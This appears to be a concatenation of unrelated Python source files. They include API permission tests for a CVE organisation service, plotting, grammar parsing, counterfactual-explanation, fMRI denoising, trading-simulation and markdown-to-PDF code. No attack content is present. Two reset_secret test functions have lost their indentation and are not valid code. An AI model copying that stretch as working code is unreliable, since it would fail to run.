        f'{env.AWG_BASE_URL}{ORG_URL}',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'SECRETARIAT_ONLY')
#### GET /org/:shortname/users ####
def test_reg_user_can_view_users_same_org(reg_user_headers):
    """ regular users can view users of the same organization """
    org = reg_user_headers['CVE-API-ORG']
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/users',
        headers=reg_user_headers
    )
    assert res.status_code == 200
    assert len(json.loads(res.content.decode())['users']) > 0

def test_reg_user_cannot_view_users_org_dne(reg_user_headers):
    """ regular users cannot view users of an organization that doesn't exist """
    org = str(uuid.uuid4())
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/users',
        headers=reg_user_headers
    )
    assert res.status_code == 404
    response_contains_json(res, 'error', 'ORG_DNE_PARAM')

def test_reg_user_cannot_view_users_another_org(reg_user_headers):
    """ regular users cannot view users of another organization """
    org = str(uuid.uuid4())
    res = post_new_org(org, org)
    assert res.status_code == 200
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/users',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_SAME_ORG_OR_SECRETARIAT')

#### GET /org/:shortname/user/:username ####
# BUG FIX: this test previously reused the name
# test_reg_user_can_view_users_same_org, silently shadowing the earlier
# test of the same name so pytest never collected it. Renamed (users ->
# user) so both tests run.
def test_reg_user_can_view_user_same_org(reg_user_headers):
    """ regular users can view a user of the same organization """
    org = reg_user_headers['CVE-API-ORG']
    user = str(uuid.uuid4())
    res = post_new_org_user(org, user)
    assert res.status_code == 200
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
        headers=reg_user_headers
    )
    ok_response_contains_json(res, 'username', user)

def test_reg_user_cannot_view_user_from_another_org(reg_user_headers):
    """ regular users cannot view users from another organization """
    org, user = create_new_user_with_new_org_by_uuid()
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_SAME_ORG_OR_SECRETARIAT')

def test_reg_user_cannot_view_user_dne(reg_user_headers):
    """ regular user cannot view user that doesn't exist """
    org = reg_user_headers['CVE-API-ORG']
    user = str(uuid.uuid4())
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
        headers=reg_user_headers
    )
    assert res.status_code == 404
    response_contains_json(res, 'error', 'USER_DNE')
#### GET /org/:shortname/id_quota ####
def test_reg_user_can_get_org_id_quota(reg_user_headers):
    """ regular users can see their organization's cve id quota """
    org = reg_user_headers['CVE-API-ORG']
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/id_quota',
        headers=reg_user_headers
    )
    # Quota payload: total allowance, amount reserved, amount remaining.
    ok_response_contains(res, 'id_quota')
    ok_response_contains(res, 'total_reserved')
    ok_response_contains(res, 'available')

def test_reg_user_cannot_get_another_org_id_quota(reg_user_headers):
    """ regular users cannot see an organization's cve id quota they don't belong to """
    org = str(uuid.uuid4())
    user = str(uuid.uuid4())
    create_new_user_with_new_org_by_shortname(org, user)
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/id_quota',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_SAME_ORG_OR_SECRETARIAT')
#### PUT /org/:shortname/user/:username/reset_secret ####
def test_regular_user_reset_secret(reg_user_headers):
""" regular users can update their secret """
org = reg_user_headers['CVE-API-ORG']
user = reg_user_headers['CVE-API-USER']
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}/reset_secret',
headers=reg_user_headers
)
ok_response_contains(res, 'API-secret')
def test_regular_user_cannot_reset_secret_of_another_user(reg_user_headers):
""" regular user cannot update the secret of another user """
org = reg_user_headers['CVE-API-ORG']
user = str(uuid.uuid4())
res = post_new_org_user(org, user) # creating a user
assert res.status_code == 200
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}/reset_secret',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_SAME_USER_OR_SECRETARIAT')
def test_regular_user_cannot_reset_secret_user_org_dne(reg_user_headers):
    """ regular user cannot reset the secret of a user from an org that doesn't exist """
    missing_org = str(uuid.uuid4())
    own_user = reg_user_headers['CVE-API-USER']
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{missing_org}/user/{own_user}/reset_secret',
        headers=reg_user_headers,
    )
    # An unknown org shortname yields 404 with the org-specific error code.
    assert res.status_code == 404
    response_contains_json(res, 'error', 'ORG_DNE_PARAM')
def test_regular_user_cannot_reset_secret_user_dne(reg_user_headers):
    """ regular user cannot reset the secret of a user that doesn't exist """
    own_org = reg_user_headers['CVE-API-ORG']
    missing_user = str(uuid.uuid4())
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{own_org}/user/{missing_user}/reset_secret',
        headers=reg_user_headers,
    )
    # An unknown username yields 404 with the user-specific error code.
    assert res.status_code == 404
    response_contains_json(res, 'error', 'USER_DNE')
def test_regular_user_cannot_reset_admin_user_secret(reg_user_headers, org_admin_headers):
    """ regular user tries resetting admin user's secret, fails and admin user's role remains preserved """
    reg_org = reg_user_headers['CVE-API-ORG']
    admin_user = org_admin_headers['CVE-API-USER']
    # Add the admin's username to the regular user's org.
    assert post_new_org_user(reg_org, admin_user).status_code == 200

    reset = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{reg_org}/user/{admin_user}/reset_secret',
        headers=reg_user_headers,
    )
    assert reset.status_code == 403
    response_contains_json(reset, 'error', 'NOT_SAME_USER_OR_SECRETARIAT')

    # The failed attempt must not have touched the admin's role.
    admin_org = org_admin_headers['CVE-API-ORG']
    lookup = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{admin_org}/user/{admin_user}',
        headers=org_admin_headers,
    )
    assert lookup.status_code == 200
    roles = json.loads(lookup.content.decode())["authority"]["active_roles"]
    assert roles[0] == "ADMIN"  # admin role still remains after attempting to change secret
#### POST /org ####
def test_reg_user_cannot_post_new_org(reg_user_headers):
    """ regular users cannot create new org """
    # Creating organizations is reserved for the secretariat role.
    res = requests.post(f'{env.AWG_BASE_URL}{ORG_URL}', headers=reg_user_headers)
    assert res.status_code == 403
    response_contains_json(res, 'error', 'SECRETARIAT_ONLY')
| StarcoderdataPython |
5114130 | import matplotlib.pyplot as plt
import numpy as np
import json
# Load the fusion-machine database shipped next to this script.
with open('../tokamaks.json') as f:
    machines = json.load(f)

# --- Figure 1: machine count by configuration type, stacked by country ---
plt.figure()
types_labels = ["Tokamaks", "Stellarators", "Inertial", "Others"]
types_machine = ["tokamak", "stellarator", "inertial", "alternate_concept"]

bottom = 0
countries = np.unique([machine["country"] for machine in machines])
for country in countries:
    # Count this country's machines for each configuration type.
    country_data = []
    for type_machine in types_machine:
        country_data.append(
            len(
                [machine for machine in machines
                 if machine["configuration"] == type_machine and
                 machine["country"] == country]))
    plt.bar(
        types_labels, country_data,
        bottom=bottom, color="tab:blue", edgecolor="white")
    bottom += np.array(country_data)

# --- Figure 2: machine count by country, stacked by configuration type ---
plt.figure()
countries = np.unique([machine["country"] for machine in machines])
countries_total = [
    len([machine for machine in machines if machine["country"] == country])
    for country in countries]

# Sort countries by total machine count (ascending) for the horizontal bars.
countries = [x for _, x in sorted(zip(countries_total, countries))]
countries_total = sorted(countries_total)

# NOTE: an unused "tokamaks, stellarators, intertials = [], [], []" line
# was removed here; those names were never read.
left = 0
for type_machine, label in zip(types_machine, types_labels):
    type_data = []
    for country in countries:
        type_data.append(
            len([machine for machine in machines
                 if machine["configuration"] == type_machine and
                 machine["country"] == country]))
    plt.barh(countries, type_data, label=label, left=left)
    left += np.array(type_data)

plt.legend()
plt.tight_layout()
plt.show()
| StarcoderdataPython |
3219399 | import re
import math
import random
import json
import sys
from nalgene.node import *
# Number of spaces per indentation level in grammar files.
SHIFT_WIDTH = 4

# Matches the run of leading spaces at the start of a line.
start_space = r'^( )*'

def count_indent(s):
    """Return the indentation level of *s* in units of SHIFT_WIDTH spaces."""
    leading = re.match(start_space, s).group(0)
    return len(leading) // SHIFT_WIDTH
def parse_string(base_dir, string):
    """Parse an indentation-structured grammar string into a Node tree.

    Lines starting with '#' are comments and are dropped.  Top-level
    '@import <file>' lines splice in another grammar file relative to
    *base_dir*.  Indentation (SHIFT_WIDTH spaces per level) determines
    nesting; ``indexes`` tracks the current child position at each level.
    """
    lines = string.split('\n')
    # Discard comment lines before any indentation bookkeeping.
    lines = [line for line in lines if not re.match(r'^\s*#', line)]

    parsed = Node('')
    indexes = [-1]   # child index per nesting level; -1 = nothing added yet
    level = 0
    last_ind = 0

    for li in range(len(lines)):
        line = lines[li]
        ind = count_indent(line)
        # Strip the leading indentation before storing the payload.
        line = re.sub(start_space, '', line).strip()
        if len(line) == 0: continue

        if level == 0 and line.startswith('@import'):
            # Splice in every top-level child of the imported grammar.
            filename = line.split(' ')[1]
            imported = parse_file(base_dir, filename)
            for child in imported:
                parsed.add(child)
                indexes[level] += 1
            continue

        if ind == last_ind: # Next item in a list
            indexes[level] += 1
        elif ind > last_ind: # Child item
            level += 1
            indexes.append(0)
        elif ind < last_ind: # Up to next item in parent list
            # NOTE(review): `diff` is computed but never used below.
            diff = (last_ind - ind)
            for i in range(last_ind - ind):
                level -= 1
                indexes.pop()
            indexes[level] += 1

        parsed.add_at(line, indexes)
        last_ind = ind

    return parsed
def tokenizeLeaf(n):
    """Split a leaf node's key on spaces, adding each token as a child.

    The node is mutated in place: it gains one child per whitespace-
    separated token, and both its ``type`` and ``key`` become 'seq'.
    """
    n.type = 'seq'
    # Unused `added = n.add(s)` binding removed; add() is called for its
    # side effect only.
    for token in n.key.split(' '):
        n.add(token)
    n.key = 'seq'
def parse_file(base_dir, filename):
    """Parse the grammar file at ``base_dir/filename`` into a Node tree.

    Uses a context manager so the file handle is closed promptly instead
    of relying on garbage collection (the original leaked the handle).
    """
    with open(base_dir + '/' + filename) as f:
        return parse_string(base_dir, f.read())
def parse_dict(obj, obj_key='%'):
    """Recursively convert a (possibly nested) dict into a Node tree.

    Dict values become child nodes keyed by their dict key; any non-dict
    value is attached directly as a leaf child.
    """
    tree = Node(obj_key)
    if not isinstance(obj, dict):
        # Leaf value: attach it directly under the new node.
        tree.add(obj)
        return tree
    for key, value in obj.items():
        tree.add(parse_dict(value, key))
    return tree
| StarcoderdataPython |
11377668 | <reponame>jayanthyetukuri/CARLA
import itertools
import numpy as np
from .sampler import Sampler
def initialize_non_saturated_action_set(
    scm,
    dataset,
    sampling_handle,
    classifier,
    factual_instance,
    intervention_set,
    num_samples=1,
    epsilon=5e-2,
):
    """Find an action set whose samples fall in the classifier's
    non-saturated region (mean positive probability in [epsilon, 0.5)).

    Starting from the factual values of the intervened-on nodes, Gaussian
    noise of growing magnitude is added (perturbations accumulate across
    iterations) until the classifier assigns the sampled instances an
    average positive probability of at least ``epsilon`` without crossing
    to the positive side of the decision boundary.

    ``dataset`` is accepted for interface compatibility but unused here.
    Returns the last action set tried if no noise level succeeds.
    """
    # default action_set: start at the factual values of the intervention set
    action_set = dict(
        zip(
            intervention_set,
            [factual_instance.dict()[node] for node in intervention_set],
        )
    )

    for noise_multiplier in np.arange(0, 10.1, 0.1):
        # perturb the current action set with scaled Gaussian noise
        action_set = {
            k: v + noise_multiplier * np.random.randn() for k, v in action_set.items()
        }

        # sample values under this candidate intervention
        sampler = Sampler(scm)
        samples_df = sampler.sample(
            num_samples,
            factual_instance,
            action_set,
            sampling_handle,
        )

        # Accept if the mean predicted probability is >= epsilon
        # (non-saturated) while still below 0.5 (not on the other side).
        # BUGFIX: the second condition used to be the *truthiness* of
        # ``mean - 0.5`` (true for any value != 0.5); it now tests < 0.5.
        mean_proba = np.mean(classifier.predict_proba(samples_df)[:, 1])
        if mean_proba >= epsilon and mean_proba < 0.5:
            return action_set

    return action_set
def get_discretized_action_sets(
    intervenable_nodes,
    min_values,
    max_values,
    mean_values,
    decimals=5,
    grid_search_bins=10,
    max_intervention_cardinality=100,
):
    """
    Get possible action sets by finding valid actions on a grid.

    Parameters
    ----------
    intervenable_nodes: dict
        Contains nodes that are not immutable
        {"continuous": [continuous nodes], "categorical": [categorical nodes]}.
    min_values: pd.Series
        min_values[node] contains the minimum feature value that node takes.
    max_values: pd.Series
        max_values[node] contains the maximum feature value that node takes.
    mean_values: pd.Series
        mean_values[node] contains the average feature value that node takes.
    decimals: int
        Precision of the grid values for continuous variables.
    grid_search_bins: int
        Number of grid values to search over per node.
    max_intervention_cardinality: int
        Maximum number of simultaneously intervened-on nodes per action set.

    Returns
    -------
    list of dict, each mapping node name -> intervention value (nodes left
    un-intervened are simply absent from the dict).
    """
    # One list of candidate values per node; None means "do not intervene".
    per_node_options = []

    # Continuous nodes: grid over [mean - 2*(mean-min), mean + 2*(max-mean)].
    # (Unused enumerate index from the original loop removed.)
    for node in intervenable_nodes["continuous"]:
        lo = mean_values[node] - 2 * (mean_values[node] - min_values[node])
        hi = mean_values[node] + 2 * (max_values[node] - mean_values[node])
        options = list(np.around(np.linspace(lo, hi, grid_search_bins), decimals))
        options.append(None)
        # dict.fromkeys de-duplicates while preserving order.
        per_node_options.append(list(dict.fromkeys(options)))

    # Categorical nodes: only binary categories are supported right now.
    for node in intervenable_nodes["categorical"]:
        options = list(np.around(np.linspace(0, 1, grid_search_bins), decimals=0))
        options.append(None)
        per_node_options.append(list(dict.fromkeys(options)))

    node_names = np.concatenate(
        [intervenable_nodes["continuous"], intervenable_nodes["categorical"]]
    )

    # Stream over the grid instead of materializing every combination first
    # (the original built the full product list before filtering).
    valid_action_sets = []
    for combo in itertools.product(*per_node_options):
        if sum(v is not None for v in combo) >= max_intervention_cardinality:
            continue
        valid_action_sets.append(
            {node: value for node, value in zip(node_names, combo) if value is not None}
        )
    return valid_action_sets
| StarcoderdataPython |
40768 | import pandas as pd
from nilearn.signal import clean
from nilearn.interfaces.fmriprep import load_confounds_strategy, load_confounds
from fmriprep_denoise.data.atlas import create_atlas_masker, get_atlas_dimensions
def generate_timeseries_per_dimension(atlas_name, output, benchmark_strategies,
                                      data_aroma, data):
    """Extract raw time series for every dimension of *atlas_name* and
    denoise them with each benchmark strategy."""
    for dimension in get_atlas_dimensions(atlas_name):
        print(f"-- {atlas_name}: dimension {dimension} --")
        print("raw time series")
        atlas_info = {"atlas_name": atlas_name, "dimension": dimension}
        subject_timeseries = _generate_raw_timeseries(output, data, atlas_info)

        for strategy_name, parameters in benchmark_strategies.items():
            print(f"Denoising: {strategy_name}")
            print(parameters)
            # AROMA strategies re-extract from the AROMA-preprocessed image;
            # all other strategies reuse the raw time series.
            if "aroma" in strategy_name:
                _clean_timeserise_aroma(atlas_name, dimension, strategy_name,
                                        parameters, output, data_aroma)
            else:
                _clean_timeserise_normal(subject_timeseries, atlas_name,
                                         dimension, strategy_name, parameters,
                                         output, data)
def get_confounds(strategy_name, parameters, img):
    """Load confound regressors and sample mask for *img*.

    The 'baseline' strategy uses nilearn's raw confound loader; every
    other strategy goes through the predefined denoising strategies.
    """
    loader = load_confounds if strategy_name == 'baseline' else load_confounds_strategy
    return loader(img, **parameters)
def _clean_timeserise_normal(subject_timeseries, atlas_name, dimension,
                             strategy_name, parameters, output, data):
    """Denoise a pre-extracted time series with a non-AROMA strategy and
    write the result to a TSV (empty frame when the scan is excluded)."""
    atlas_spec = f"atlas-{atlas_name}_nroi-{dimension}"
    _, img, ts_path = _get_output_info(strategy_name, output, data, atlas_spec)
    reduced_confounds, sample_mask = get_confounds(strategy_name, parameters, img)

    if _check_exclusion(reduced_confounds, sample_mask):
        # Too many volumes would be scrubbed; store an empty time series.
        cleaned = []
    else:
        cleaned = clean(subject_timeseries,
                        detrend=True, standardize=True,
                        sample_mask=sample_mask,
                        confounds=reduced_confounds)
    pd.DataFrame(cleaned).to_csv(ts_path, sep='\t', index=False)
def _clean_timeserise_aroma(atlas_name, dimension, strategy_name, parameters,
                            output, data_aroma):
    """Extract and denoise time series from the AROMA-preprocessed image,
    then write the result to a TSV file."""
    atlas_spec = f"atlas-{atlas_name}_nroi-{dimension}"
    subject_mask, img, ts_path = _get_output_info(strategy_name, output,
                                                  data_aroma, atlas_spec)
    reduced_confounds, sample_mask = get_confounds(strategy_name, parameters, img)

    # AROMA requires masking/extraction directly from the cleaned image.
    aroma_masker, _ = create_atlas_masker(atlas_name, dimension, subject_mask,
                                          nilearn_cache="")
    cleaned = aroma_masker.fit_transform(
        img, confounds=reduced_confounds, sample_mask=sample_mask)
    pd.DataFrame(cleaned).to_csv(ts_path, sep='\t', index=False)
def _generate_raw_timeseries(output, data, atlas_info):
    """Extract (or load from cache) the raw atlas time series for one subject.

    Writes the extraction to a per-subject TSV on first run and re-reads
    that file on subsequent runs instead of re-running the masker.
    """
    subject_spec, subject_output, subject_mask = _get_subject_info(output, data)
    rawts_path = subject_output / f"{subject_spec}_atlas-{atlas_info['atlas_name']}_nroi-{atlas_info['dimension']}_desc-raw_timeseries.tsv"
    raw_masker, atlas_labels = create_atlas_masker(atlas_info['atlas_name'],
                                                   atlas_info['dimension'],
                                                   subject_mask,
                                                   detrend=False,
                                                   nilearn_cache="")
    # Empty frame carrying the full label set; concatenating with it below
    # restores any atlas regions missing from the extracted data as NaN columns.
    timeseries_labels = pd.DataFrame(columns=atlas_labels)
    if not rawts_path.is_file():
        subject_timeseries = raw_masker.fit_transform(data.func[0])
        df = pd.DataFrame(subject_timeseries, columns=raw_masker.labels_)
        # make sure missing labels were put back
        df = pd.concat([timeseries_labels, df])
        df.to_csv(rawts_path, sep='\t', index=False)
    else:
        # Cached extraction exists: reuse it instead of re-running the masker.
        df = pd.read_csv(rawts_path, header=0, sep='\t')
        subject_timeseries = df.values
    del raw_masker
    return subject_timeseries
def _get_output_info(strategy_name, output, data, atlas_spec):
    """Return (brain-mask path, functional image path, output TSV path)."""
    subject_spec, subject_output, subject_mask = _get_subject_info(output, data)
    ts_filename = f"{subject_spec}_{atlas_spec}_desc-{strategy_name}_timeseries.tsv"
    return subject_mask, data.func[0], subject_output / ts_filename
def _check_exclusion(reduced_confounds, sample_mask):
if sample_mask is not None:
kept_vol = len(sample_mask) / reduced_confounds.shape[0]
remove = 1 - kept_vol
else:
remove = 0
remove = remove > 0.2
return remove
def _get_subject_info(output, data):
img = data.func[0]
subject_spec = data.func[0].split('/')[-1].split('_desc-')[0]
subject_root = img.split(subject_spec)[0]
subject_id = subject_spec.split('_')[0]
subject_output = output / subject_id
subject_output.mkdir(exist_ok=True)
subject_mask = f"{subject_root}/{subject_spec}_desc-brain_mask.nii.gz"
return subject_spec, subject_output, subject_mask
| StarcoderdataPython |
11378787 | from os import close, name
from broker import Broker
from config import AssetType, Config, SpreadMode
from sessional_spread import SessionalSpread
from typing import List, Dict
from datetime import timedelta
import pandas as pd
import numpy as np
import talib as ta
class Symbol:
    """One tradable instrument: couples a Broker with the contract
    specification from ``Config.symbols`` and handles spread modelling,
    point-value conversion and example talib indicator features."""

    def __init__(self,
                 broker: Broker,
                 symbol: str) -> None:
        '''
        broker: Broker -> Specifies a broker for the symbol
        symbol: str -> Symbol name (must exist both at the broker and in
        Config.symbols)
        '''
        assert symbol in broker.symbols, "Invalid symbol"
        assert len(list(filter(lambda x: x["name"] == symbol, Config.symbols))) == 1, "Symbol details not set in config file"
        self.broker = broker
        # getting the symbol specification from the Config class
        self.info = list(filter(lambda x: x["name"] == symbol, Config.symbols))[0]
        # getting the cash currency pair
        self.cash_pair: str = self.get_cash_pair()
        # initialize the sessional_spread to None
        self.sessional_spread: SessionalSpread = None
        '''
        The following are example to illustrate adding the features for the symbol
        '''
        # self.add_ema()
        # self.add_band()
        # self.add_roc()
        # self.add_atr()

    def get_cash_pair(self) -> str:
        '''
        Return the FX pair used to convert between this symbol's quote
        currency and the account currency.  For non-FOREX assets the
        account currency itself is returned.
        '''
        result: str = None
        if self.info["asset_type"] == AssetType.FOREX:
            if self.info["quote"] != Config.account["currency"]:
                # find the single broker pair containing both currencies
                tmp: List[str] = list(filter(lambda x: self.info["quote"] in x and Config.account["currency"] in x, self.broker.symbols))
                assert len(tmp) == 1, "None or more than 1 of fx pair is found"
                result = tmp[0]
            else:
                result = self.info["name"]
        else:
            result = Config.account["currency"]
        return result

    def get_rate(self) -> Dict:
        '''
        Return the current price rates for the symbol (for use in
        trading simulation), keyed by feature name plus "dt"/"dt_close".
        '''
        tmp = self.broker.get_data(
            symbol = self.info["name"],
            window_size = 1,
            features = ["tf", "open", "high", "low", "close", "vol", "bid", "ask", "spread"])
        result: Dict = dict(zip(tmp.index, tmp.tolist()))
        result["dt"] = tmp.name
        # bar close time = open time + timeframe minutes, minus 1 ms
        result["dt_close"] = result["dt"] + timedelta(minutes = result["tf"]) - timedelta(milliseconds=1)
        result.pop("tf")
        return result

    def get_pt_value(self, applied_price: str = "close") -> float:
        '''
        Return the point value of the symbol expressed in the account
        currency.
        applied_price:str -> one of 'open', 'high', 'low', 'close'; the
        cash-pair rate at this price is used for the conversion.
        '''
        val: float = 1
        if self.info["asset_type"] == AssetType.FOREX:
            if self.info["quote"] != Config.account["currency"]:
                # invert the cash-pair rate to convert into account currency
                tmp = self.broker.get_data(self.cash_pair, 1, [applied_price])
                val = 1/tmp[applied_price]
        else:
            assert self.info["fixed_pt_value"] > 0, "Invalid fixed point value for the underlying asset."
            val = self.info["fixed_pt_value"]
        assert val > 0, "Invalid point value for the underlying asset."
        return val

    def set_spread(self, session_spread: SessionalSpread = None) -> None:
        '''
        Configure the spread of the underlying instrument according to
        the spread mode declared in its Config entry.
        '''
        if self.info["spread_mode"] == SpreadMode.RANDOM:
            # uniform random spread between the configured min/max points
            s = np.random.uniform(
                low = self.info["min_spread"]/(10**self.info["digits"]),
                high = self.info["max_spread"]/(10**self.info["digits"]),
                size = len(self.broker.dt)
            )
            s = np.round(s, self.info["digits"])
            spread : pd.Series = pd.Series(s, name = "spread", index = self.broker.dt)
            self.broker.add_features(self.info["name"], spread)
        if self.info["spread_mode"] in [SpreadMode.FIXED, SpreadMode.IGNORE]:
            # IGNORE stores a zero spread; FIXED stores a constant one
            s = np.zeros(len(self.broker.dt))
            if self.info["spread_mode"] == SpreadMode.FIXED:
                s += self.info["fixed_spread"]
            spread : pd.Series = pd.Series(s, name = "spread", index = self.broker.dt)
            self.broker.add_features(self.info["name"], spread)
        if self.info["spread_mode"] == SpreadMode.SESSIONAL:
            assert session_spread != None, "Sessional Spread is not provided"
            self.sessional_spread = session_spread
        if self.info["spread_mode"] == SpreadMode.BIDASK:
            # derive the spread directly from recorded bid/ask quotes
            tmp: pd.DataFrame = self.broker.get_data(
                symbol = self.info["name"],
                window_size = 0,
                features = ["bid", "ask"]
            )
            sprad = tmp.ask - tmp.bid
            self.broker.add_features(self.info["name"], sprad, "spread")

    def get_spread(self) -> float:
        '''
        Return the current spread according to the configured spread mode.
        '''
        if self.info["spread_mode"] == SpreadMode.SESSIONAL:
            assert self.sessional_spread != None, "Sessional spread is not set"
            return self.sessional_spread.get_spread(self.broker.dt[self.broker.shift])
        if self.info["spread_mode"] in [SpreadMode.FIXED, SpreadMode.BIDASK, SpreadMode.RANDOM]:
            if self.info["name"] in self.broker.symbols:
                tmp = self.broker.get_data(self.info["name"], 1, ["spread"])
                return tmp.spread
        if self.info["spread_mode"] == SpreadMode.IGNORE:
            return 0.0

    def add_sto(self) -> None:
        '''
        Demo: add a stochastic oscillator feature to the symbol via talib.
        '''
        rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
        slowk, slowd = ta.STOCH(high=rates.high,
                                low=rates.low,
                                fastk_period=5,
                                close=rates.close,
                                slowk_period=3,
                                slowk_matype=0,
                                slowd_period=3,
                                slowd_matype=0)
        self.broker.add_features(symbol = self.info["name"], features = slowk, feature_name = "sto_fast")
        self.broker.add_features(symbol = self.info["name"], features = slowd, feature_name = "sto_slow")

    def add_ema(self) -> None:
        '''
        Demo: add an EMA-based signal feature to the symbol via talib.
        '''
        rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
        ema = ta.EMA(rates.close, timeperiod=5)
        # binary signal: 1 when price is above its EMA, else 0
        ema_code = rates.close - ema
        ema_code = ema_code.apply(lambda x: 1 if x>0 else 0)
        self.broker.add_features(symbol = self.info["name"], features = ema_code, feature_name = "ema")

    def add_roc(self) -> None:
        '''
        Demo: add the Rate Of Change of the symbol via talib.
        '''
        rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
        roc = ta.ROC(rates.close, timeperiod=5)
        self.broker.add_features(symbol = self.info["name"], features = roc, feature_name = "roc")

    def add_band(self) -> None:
        '''
        Demo: add Bollinger Band features to the symbol via talib.
        '''
        rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
        upper, middle, lower = ta.BBANDS(rates.close, timeperiod=5, nbdevup=2, nbdevdn=2, matype=0)
        self.broker.add_features(symbol = self.info["name"], features = upper, feature_name = "bb_upper")
        self.broker.add_features(symbol = self.info["name"], features = middle, feature_name = "bb_middle")
        self.broker.add_features(symbol = self.info["name"], features = lower, feature_name = "bb_lower")

    def add_atr(self) -> None:
        '''
        Demo: add the Average True Range indicator to the symbol via talib.
        '''
        rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
        atr = ta.ATR(high=rates.high,
                     low=rates.low,
                     close=rates.close,
                     timeperiod=5)
        self.broker.add_features(symbol = self.info["name"], features = atr, feature_name = "atr")
| StarcoderdataPython |
6595360 | import os
from redlib.api.system import is_linux, is_windows
from .bash_script_installer import BASHScriptInstaller
from .posh_script_installer import PoshScriptInstaller
from .shell_script_installer import ShellScriptInstallError
def get_shell_script_installer():
    """Return the script installer for the current platform/shell.

    Raises ShellScriptInstallError when the platform is not Linux or the
    login shell is not BASH (the only shell currently supported).
    """
    if not is_linux():
        raise ShellScriptInstallError('platform not supported')
    shell = os.environ.get('SHELL', None)
    if shell is None or 'bash' not in shell:
        raise ShellScriptInstallError('shell not supported (currently supported: BASH)')
    return BASHScriptInstaller()
def platform_supported():
    """Return True when a shell script installer exists for this platform."""
    try:
        get_shell_script_installer()
        return True
    except ShellScriptInstallError:
        return False
| StarcoderdataPython |
3567937 | <filename>markdown2pdf.py
# -*- coding: utf-8 -*-
import markdown
import ho.pisa as pisa
import StringIO
import os
import re
from Cheetah.Template import Template
from tempfile import NamedTemporaryFile
debug = False
def markdown2pdf(text, pdffile, cssfile='xhtml2pdf.css', src_dir='.',
                 fontfile='arial.ttf', skipTo1st=False):
    """Render markdown *text* into the PDF file *pdffile* (Python 2 code).

    Uses python-markdown for HTML conversion, Cheetah templates for the
    cover page and CSS, and ho.pisa (xhtml2pdf) for the PDF itself.

    text      -- markdown source (with optional meta: cover_url/title/author)
    pdffile   -- output path for the generated PDF
    cssfile   -- CSS template name under template/pdf/
    src_dir   -- base directory for resolving relative image paths
    fontfile  -- font file name substituted into the CSS template
    skipTo1st -- when True, drop all body HTML before the first <h1>
    """
    global debug
    md = markdown.Markdown(extensions=['meta','footnotes'])
    html = md.convert(text)

    # post-process unofficial markup
    # 1) <p>*</p> --> <p class="blankpara"> </p>
    # 2) quotation mark normalization (strip trailing space after opening quotes)
    html = html.replace('<p>*</p>', '<p class="blankpara"> </p>')
    html = re.sub(u'“ ?', "“", html)
    html = html.replace(u'”',"”")
    html = re.sub(u"‘ ?", "‘", html)
    html = html.replace(u"’","’")

    if debug:
        open('test.html','w').write(html.encode('utf-8'))

    htmline = []

    #-- Cover & Title Page
    cover_file = None
    title = None
    author = None
    cif = None
    if 'cover_url' in md.Meta:
        cover_url = md.Meta['cover_url'][0]
        if cover_url.startswith('http://'):
            import urllib
            # download the remote cover image into a temp file kept on disk
            cif = NamedTemporaryFile(delete=False)
            cif.write( urllib.urlopen(cover_url).read() )
            cif.close()
            cover_file = cif.name
        else:
            cover_file = cover_url
            if cover_url.startswith('file://'):
                cover_file = cover_url[7:]
    if 'title' in md.Meta:
        title = md.Meta['title'][0].replace(', ','<br />')
    if 'author' in md.Meta:
        author = md.Meta['author'][0].replace(', ','<br />')
    cover_tmpl = open(os.path.join('template','pdf','coverpage.html'), 'r').read().decode('utf-8')
    coverpg_htm = str( Template(cover_tmpl, searchList=[ {'cover_url':cover_file,'title':title,'author':author} ]) )
    htmline.append( unicode(coverpg_htm,'utf-8') )

    #-- Body
    # rewrite relative image paths so they resolve against src_dir
    for url in re.compile('<img [^>]*src="(.*?)"').findall(html):
        if url.startswith('http://') or os.path.isabs(url):
            pass
        else:
            html = html.replace(url, os.path.normpath(src_dir+'/'+url))
    if skipTo1st:
        # drop everything before the first <h1> heading
        html = html[ html.find('<h1'): ]
    html = html.replace('<h1 />','<h1></h1>')
    htmline.append(html)

    #-- PDF generation
    css_tmpl = open(os.path.join('template','pdf',cssfile), 'r').read().decode('utf-8')
    target_css = str( Template(css_tmpl, searchList=[ {'font':'fonts/'+fontfile} ]) )

    fp = file(pdffile,'wb')
    pdf = pisa.pisaDocument(
        StringIO.StringIO('\n'.join(htmline).encode('utf-8')),
        fp,
        #path=src_dir, # not working!
        #link_callback=fetch_resources,
        default_css=target_css,
        #xhtml=True,
        encoding='utf-8')
    fp.close()

    # clean up the temporary cover-image download, if any
    if cif and os.path.exists(cif.name):
        os.remove(cif.name)

    #if debug and not pdf.err:
    #    pisa.startViewer(pdffile)
